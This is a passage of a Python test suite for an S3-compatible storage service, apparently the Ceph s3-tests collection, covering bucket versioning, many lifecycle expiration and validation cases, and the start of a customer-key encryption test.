@attr('versioning')
def test_versioned_concurrent_object_create_and_remove():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'myobj'
num_versions = 3
all_threads = []
for i in range(3):
t = _do_create_versioned_obj_concurrent(client, bucket_name, key, num_versions)
all_threads.append(t)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
all_threads.append(t)
for t in all_threads:
_do_wait_completion(t)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config')
@attr('lifecycle')
def test_lifecycle_set():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 2}, 'Prefix': 'test2/', 'Status':'Disabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get lifecycle config')
@attr('lifecycle')
def test_lifecycle_get():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'test1/', 'Expiration': {'Days': 31}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'test2/', 'Expiration': {'Days': 120}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.get_bucket_lifecycle_configuration(Bucket=bucket_name)
eq(response['Rules'], rules)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get lifecycle config no id')
@attr('lifecycle')
def test_lifecycle_get_no_id():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'Expiration': {'Days': 31}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'Expiration': {'Days': 120}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.get_bucket_lifecycle_configuration(Bucket=bucket_name)
current_lc = response['Rules']
Rule = namedtuple('Rule',['prefix','status','days'])
rules = {'rule1' : Rule('test1/','Enabled',31),
'rule2' : Rule('test2/','Enabled',120)}
for lc_rule in current_lc:
if lc_rule['Prefix'] == rules['rule1'].prefix:
eq(lc_rule['Expiration']['Days'], rules['rule1'].days)
eq(lc_rule['Status'], rules['rule1'].status)
assert 'ID' in lc_rule
elif lc_rule['Prefix'] == rules['rule2'].prefix:
eq(lc_rule['Expiration']['Days'], rules['rule2'].days)
eq(lc_rule['Status'], rules['rule2'].status)
assert 'ID' in lc_rule
else:
            # a rule we did not supply came back, something is wrong
print("rules not right")
assert False
# The test harness for lifecycle is configured to treat days as 10 second intervals.
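# Under that mapping, a sleep of 28s is roughly 2.8 "days", so Days=1 rules have
# fired while Days=4 rules have not; the later sleeps in these tests push past
# the Days=4 boundary as well.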
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration():
bucket_name = _create_objects(keys=['expire1/foo', 'expire1/bar', 'keep2/foo',
'keep2/bar', 'expire3/foo', 'expire3/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'expire1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 4}, 'Prefix': 'expire3/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
time.sleep(10)
response = client.list_objects(Bucket=bucket_name)
keep2_objects = response['Contents']
time.sleep(20)
response = client.list_objects(Bucket=bucket_name)
expire3_objects = response['Contents']
eq(len(init_objects), 6)
eq(len(expire1_objects), 4)
eq(len(keep2_objects), 4)
eq(len(expire3_objects), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with list-objects-v2')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
@attr('list-objects-v2')
def test_lifecyclev2_expiration():
bucket_name = _create_objects(keys=['expire1/foo', 'expire1/bar', 'keep2/foo',
'keep2/bar', 'expire3/foo', 'expire3/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'expire1/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Days': 4}, 'Prefix': 'expire3/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects_v2(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(28)
response = client.list_objects_v2(Bucket=bucket_name)
expire1_objects = response['Contents']
time.sleep(10)
response = client.list_objects_v2(Bucket=bucket_name)
keep2_objects = response['Contents']
time.sleep(20)
response = client.list_objects_v2(Bucket=bucket_name)
expire3_objects = response['Contents']
eq(len(init_objects), 6)
eq(len(expire1_objects), 4)
eq(len(keep2_objects), 4)
eq(len(expire3_objects), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration on versioning enabled bucket')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_versioning_enabled():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 1)
client.delete_object(Bucket=bucket_name, Key="test1/a")
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(30)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
delete_markers = response['DeleteMarkers']
eq(len(versions), 1)
eq(len(delete_markers), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with 1 tag')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_tags1():
bucket_name = get_new_bucket()
client = get_client()
tom_key = 'days1/tom'
tom_tagset = {'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'}]}
client.put_object(Bucket=bucket_name, Key=tom_key, Body='tom_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=tom_key,
Tagging=tom_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'Expiration': {
'Days': 1,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': 'days1/',
'Tag': {
'Key': 'tom',
'Value': 'sawyer'
},
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
    time.sleep(28)
    # list the bucket after the expiration interval; the tagged object should be gone
    response = client.list_objects(Bucket=bucket_name)
    try:
        expire_objects = response['Contents']
    except KeyError:
        expire_objects = []
    eq(len(expire_objects), 0)
# factor out common setup code
def setup_lifecycle_tags2(client, bucket_name):
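    # tags two objects under days1/ and installs a rule whose Filter combines a
    # Prefix, a Tag and an And block; the tests using this helper expect exactly
    # one of the two objects to survive the expiration window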
tom_key = 'days1/tom'
tom_tagset = {'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'}]}
client.put_object(Bucket=bucket_name, Key=tom_key, Body='tom_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=tom_key,
Tagging=tom_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
huck_key = 'days1/huck'
huck_tagset = {
'TagSet':
[{'Key': 'tom', 'Value': 'sawyer'},
{'Key': 'huck', 'Value': 'finn'}]}
client.put_object(Bucket=bucket_name, Key=huck_key, Body='huck_body')
response = client.put_object_tagging(Bucket=bucket_name, Key=huck_key,
Tagging=huck_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'Expiration': {
'Days': 1,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': 'days1/',
'Tag': {
'Key': 'tom',
'Value': 'sawyer'
},
'And': {
'Prefix': 'days1',
'Tags': [
{
'Key': 'huck',
'Value': 'finn'
},
]
}
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with 2 tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_tags2():
bucket_name = get_new_bucket()
client = get_client()
response = setup_lifecycle_tags2(client, bucket_name)
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
eq(len(expire1_objects), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with versioning and 2 tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_versioned_tags2():
bucket_name = get_new_bucket()
client = get_client()
# mix in versioning
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
response = setup_lifecycle_tags2(client, bucket_name)
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
eq(len(expire1_objects), 1)
# setup for a scenario based on Vidushi Mishra's report in rhbz#1877737
def setup_lifecycle_noncur_tags(client, bucket_name, days):
# first create and tag the objects (10 versions of 1)
key = "myobject_"
tagset = {'TagSet':
[{'Key': 'vidushi', 'Value': 'mishra'}]}
for ix in range(10):
body = "%s v%d" % (key, ix)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.put_object_tagging(Bucket=bucket_name, Key=key,
Tagging=tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'NoncurrentVersionExpiration': {
'NoncurrentDays': days,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': '',
'Tag': {
'Key': 'vidushi',
'Value': 'mishra'
},
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
def verify_lifecycle_expiration_noncur_tags(client, bucket_name, secs):
time.sleep(secs)
    try:
        response = client.list_object_versions(Bucket=bucket_name)
        objs_list = response['Versions']
    except KeyError:
        objs_list = []
return len(objs_list)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle noncurrent expiration with 1 tag filter')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_noncur_tags1():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
# create 10 object versions (9 noncurrent) and a tag-filter
# noncurrent version expiration at 4 "days"
response = setup_lifecycle_noncur_tags(client, bucket_name, 4)
num_objs = verify_lifecycle_expiration_noncur_tags(
client, bucket_name, 20)
# at T+20, 10 objects should exist
eq(num_objs, 10)
num_objs = verify_lifecycle_expiration_noncur_tags(
client, bucket_name, 40)
# at T+60, only the current object version should exist
eq(num_objs, 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='id too long in lifecycle rule')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_id_too_long():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 256*'a', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='same id')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_same_id():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='invalid status in lifecycle rule')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_invalid_status():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'disabled'}]
lifecycle = {'Rules': rules}
    e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'invalid'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with expiration date')
@attr('lifecycle')
def test_lifecycle_set_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2017-09-27'}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with not iso8601 date')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_set_invalid_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '20200101'}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with date')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_date():
bucket_name = _create_objects(keys=['past/foo', 'future/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2015-01-01'}, 'Prefix': 'past/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Date': '2030-01-01'}, 'Prefix': 'future/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(20)
response = client.list_objects(Bucket=bucket_name)
expire_objects = response['Contents']
eq(len(init_objects), 2)
eq(len(expire_objects), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration days 0')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_days0():
bucket_name = _create_objects(keys=['days0/foo', 'days0/bar'])
client = get_client()
rules=[{'Expiration': {'Days': 0}, 'ID': 'rule1', 'Prefix': 'days0/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
# days: 0 is legal in a transition rule, but not legal in an
# expiration rule
response_code = ""
try:
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
except botocore.exceptions.ClientError as e:
response_code = e.response['Error']['Code']
eq(response_code, 'InvalidArgument')
def setup_lifecycle_expiration(client, bucket_name, rule_id, delta_days,
rule_prefix):
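    # installs a single expiration rule for rule_prefix, then uploads one object
    # under that prefix and returns the PutObject response (whose headers should
    # carry x-amz-expiration for the header checks below)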
rules=[{'ID': rule_id,
'Expiration': {'Days': delta_days}, 'Prefix': rule_prefix,
'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
key = rule_prefix + 'foo'
body = 'bar'
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
def check_lifecycle_expiration_header(response, start_time, rule_id,
delta_days):
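    # returns True only when the x-amz-expiration header is present and both its
    # expiry-date (start_time + delta_days) and rule-id match the expected rule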
expr_exists = ('x-amz-expiration' in response['ResponseMetadata']['HTTPHeaders'])
if (not expr_exists):
return False
expr_hdr = response['ResponseMetadata']['HTTPHeaders']['x-amz-expiration']
m = re.search(r'expiry-date="(.+)", rule-id="(.+)"', expr_hdr)
expiration = dateutil.parser.parse(m.group(1))
days_to_expire = ((expiration.replace(tzinfo=None) - start_time).days == delta_days)
rule_eq_id = (m.group(2) == rule_id)
return days_to_expire and rule_eq_id
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration header put')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_put():
bucket_name = get_new_bucket()
client = get_client()
now = datetime.datetime.now(None)
response = setup_lifecycle_expiration(
client, bucket_name, 'rule1', 1, 'days1/')
eq(check_lifecycle_expiration_header(response, now, 'rule1', 1), True)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_head():
bucket_name = get_new_bucket()
client = get_client()
now = datetime.datetime.now(None)
response = setup_lifecycle_expiration(
client, bucket_name, 'rule1', 1, 'days1/')
key = 'days1/' + 'foo'
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, now, 'rule1', 1), True)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head with tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_tags_head():
bucket_name = get_new_bucket()
client = get_client()
lifecycle={
"Rules": [
{
"Filter": {
"Tag": {"Key": "key1", "Value": "tag1"}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
key1 = "obj_key1"
body1 = "obj_key1_body"
tags1={'TagSet': [{'Key': 'key1', 'Value': 'tag1'},
{'Key': 'key5','Value': 'tag5'}]}
response = client.put_object(Bucket=bucket_name, Key=key1, Body=body1)
response = client.put_object_tagging(Bucket=bucket_name, Key=key1,Tagging=tags1)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), True)
# test that header is not returning when it should not
lifecycle={
"Rules": [
{
"Filter": {
"Tag": {"Key": "key2", "Value": "tag1"}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), False)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head with tags and And')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_and_tags_head():
now = datetime.datetime.now(None)
bucket_name = get_new_bucket()
client = get_client()
lifecycle={
"Rules": [
{
"Filter": {
"And": {
"Tags": [
{
"Key": "key1",
"Value": "tag1"
},
{
"Key": "key5",
"Value": "tag6"
}
]
}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
key1 = "obj_key1"
body1 = "obj_key1_body"
tags1={'TagSet': [{'Key': 'key1', 'Value': 'tag1'},
{'Key': 'key5','Value': 'tag5'}]}
response = client.put_object(Bucket=bucket_name, Key=key1, Body=body1)
response = client.put_object_tagging(Bucket=bucket_name, Key=key1,Tagging=tags1)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with noncurrent version expiration')
@attr('lifecycle')
def test_lifecycle_set_noncurrent():
bucket_name = _create_objects(keys=['past/foo', 'future/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 2}, 'Prefix': 'past/', 'Status':'Enabled'},
{'ID': 'rule2', 'NoncurrentVersionExpiration': {'NoncurrentDays': 3}, 'Prefix': 'future/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle non-current version expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_noncur_expiration():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 3)
# not checking the object contents on the second run, because the function doesn't support multiple checks
create_multiple_versions(client, bucket_name, "test2/abc", 3, check_versions=False)
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 2}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_object_versions(Bucket=bucket_name)
expire_versions = response['Versions']
eq(len(init_versions), 6)
eq(len(expire_versions), 4)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with delete marker expiration')
@attr('lifecycle')
def test_lifecycle_set_deletemarker():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with Filter')
@attr('lifecycle')
def test_lifecycle_set_filter():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Filter': {'Prefix': 'foo'}, 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with empty Filter')
@attr('lifecycle')
def test_lifecycle_set_empty_filter():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Filter': {}, 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle delete marker expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_deletemarker_expiration():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 1)
create_multiple_versions(client, bucket_name, "test2/abc", 1, check_versions=False)
client.delete_object(Bucket=bucket_name, Key="test1/a")
client.delete_object(Bucket=bucket_name, Key="test2/abc")
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
deleted_versions = response['DeleteMarkers']
total_init_versions = init_versions + deleted_versions
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 1}, 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
deleted_versions = response['DeleteMarkers']
total_expire_versions = init_versions + deleted_versions
eq(len(total_init_versions), 4)
eq(len(total_expire_versions), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with multipart expiration')
@attr('lifecycle')
def test_lifecycle_set_multipart():
bucket_name = get_new_bucket()
client = get_client()
rules = [
{'ID': 'rule1', 'Prefix': 'test1/', 'Status': 'Enabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 2}},
{'ID': 'rule2', 'Prefix': 'test2/', 'Status': 'Disabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 3}}
]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle multipart expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_multipart_expiration():
bucket_name = get_new_bucket()
client = get_client()
key_names = ['test1/a', 'test2/']
upload_ids = []
for key in key_names:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_ids.append(response['UploadId'])
response = client.list_multipart_uploads(Bucket=bucket_name)
init_uploads = response['Uploads']
rules = [
{'ID': 'rule1', 'Prefix': 'test1/', 'Status': 'Enabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 2}},
]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_multipart_uploads(Bucket=bucket_name)
expired_uploads = response['Uploads']
eq(len(init_uploads), 2)
eq(len(expired_uploads), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config transition with non-ISO 8601 date')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_transition_set_invalid_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2023-09-27'},'Transitions': [{'Date': '20220927','StorageClass': 'GLACIER'}],'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
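# For comparison with the rejected '20220927' above, a transition date the API
# accepts is an ISO 8601 timestamp at midnight UTC, as sketched below. This
# constant is illustrative only and is not used by any test here; the exact
# accepted format is an assumption based on the S3 lifecycle documentation.
_example_valid_transition_rules = [
    {'ID': 'rule1', 'Prefix': 'test1/', 'Status': 'Enabled',
     'Transitions': [{'Date': '2022-09-27T00:00:00Z', 'StorageClass': 'GLACIER'}]},
]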
def _test_encryption_sse_customer_write(file_size):
"""
Tests Create a file of A's, use it to set_contents_from_file.
Create a file of B's, use it to re-set_contents_from_file.
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
key = 'testobj'
data = 'A'*file_size
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
